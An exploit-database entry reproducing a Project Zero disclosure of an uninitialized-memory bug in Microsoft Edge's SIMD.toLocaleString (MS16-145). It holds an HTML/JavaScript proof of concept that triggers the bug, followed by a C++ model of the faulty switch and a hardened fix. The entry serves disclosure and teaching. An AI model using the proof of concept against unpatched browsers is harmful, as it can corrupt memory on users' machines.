Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145) Exploit

1337DAY-ID-26560
Author: Google Security Research
Source: 0day.today
Published: 2016-12-21
EPSS: 0.844 (High), percentile 98.5%

Exploit for windows platform in category dos / poc

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=961
 
The following code occurs in JavascriptSIMDObject::ToLocaleString in JavascriptSimdObject.cpp:
 
        Var* newArgs = HeapNewArray(Var, numArgs);
        switch (numArgs)
        {
        case 1:
            break;
        case 2:
            newArgs[1] = args[1];
            break;
        case 3:
            newArgs[1] = args[1];
            newArgs[2] = args[2];
            break;
        default:
            Assert(UNREACHED);
        }
 
If the call has more than three arguments, the switch reaches the default branch and none of the newArgs slots is written, so newArgs is passed on uninitialized. toLocaleString is then invoked over uninitialized heap memory, which has an effect similar to a type confusion (integers in that memory can be interpreted as pointers and vice-versa). A minimal PoC is as follows, and a full PoC is attached:
 
    var v = SIMD.Int32x4(1, 2, 3, 4);
    v.toLocaleString(1, 2, 3, 4)
-->
 
<html><body><script>
try {
    var v = SIMD.Int32x4(1, 2, 3, 4);
    alert(v.toLocaleString(1, 2, 3, 4, 5, 6, 7));
} catch (e) {
    alert(e.message);
}
</script></body></html>
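The fall-through in the quoted switch, modelled in C++ as an added example (this is not Chakra's code and not the vendor's patch). `Var` is a hypothetical stand-in for the engine's value type, a poison pattern stands in for whatever the allocator left behind so that untouched slots are observable without undefined behaviour, and `buildArgsHardened` is this example's own correction: the copy is driven by the real argument count and the array is zero-initialised first. The quoted switch never writes slot 0 in any case, so the comparison only looks at slots 1 and up.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

// Hypothetical stand-in for the engine's Var: an opaque pointer-sized slot.
typedef void* Var;

// Poison pattern standing in for leftover heap contents (constructed for this
// example); HeapNewArray does no zeroing, so untouched slots keep such garbage.
static const uintptr_t kPoison = 0xABABABABu;

static Var poisonSlot() { return reinterpret_cast<Var>(kPoison); }

// Models the switch quoted from JavascriptSIMDObject::ToLocaleString: only the
// 1-, 2- and 3-argument cases copy anything; the default branch carries just an
// Assert, so with more arguments every slot is left exactly as allocated.
std::vector<Var> buildArgsOriginal(const std::vector<Var>& args) {
    const size_t numArgs = args.size();
    std::vector<Var> newArgs(numArgs, poisonSlot());  // "uninitialized" allocation
    switch (numArgs) {
    case 1:
        break;
    case 2:
        newArgs[1] = args[1];
        break;
    case 3:
        newArgs[1] = args[1];
        newArgs[2] = args[2];
        break;
    default:
        break;  // Assert(UNREACHED) only; nothing is written to newArgs
    }
    return newArgs;
}

// Hardened variant (this example's own fix): zero-initialise the array and copy
// every caller-supplied argument, so no slot the callee can read is untouched.
std::vector<Var> buildArgsHardened(const std::vector<Var>& args) {
    const size_t numArgs = args.size();
    std::vector<Var> newArgs(numArgs, static_cast<Var>(nullptr));
    for (size_t i = 1; i < numArgs; ++i) {
        newArgs[i] = args[i];
    }
    return newArgs;
}

// Counts slots from index 1 upward that still hold the poison pattern, i.e.
// slots a callee would read as uninitialized memory.
size_t countUninitialized(const std::vector<Var>& newArgs) {
    size_t n = 0;
    for (size_t i = 1; i < newArgs.size(); ++i) {
        if (newArgs[i] == poisonSlot()) ++n;
    }
    return n;
}

// Builds a constructed argument vector of the given length with dummy values
// (0x1000, 0x1001, ...), standing in for the receiver plus call arguments.
std::vector<Var> makeArgs(size_t count) {
    std::vector<Var> args;
    for (size_t i = 0; i < count; ++i) {
        args.push_back(reinterpret_cast<Var>(static_cast<uintptr_t>(0x1000 + i)));
    }
    return args;
}

int main() {
    // Three arguments: fully handled by the switch, nothing left uninitialized.
    std::printf("3 args, original: %zu uninitialized slots\n",
                countUninitialized(buildArgsOriginal(makeArgs(3))));
    // Seven arguments (as in the PoC): the original leaves slots 1..6 untouched.
    std::printf("7 args, original: %zu uninitialized slots\n",
                countUninitialized(buildArgsOriginal(makeArgs(7))));
    std::printf("7 args, hardened: %zu uninitialized slots\n",
                countUninitialized(buildArgsHardened(makeArgs(7))));
    return 0;
}
```

The first two calls show why the minimal PoC needs more than three arguments: up to three the switch writes every slot it is meant to, and from four onward it writes none. The hardened builder removes the arity-specific cases entirely, which is the shape of fix a reviewer would ask for whenever a fixed-size switch stands in for a bounds-checked loop over caller-controlled input.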

#  0day.today [2018-04-01]  #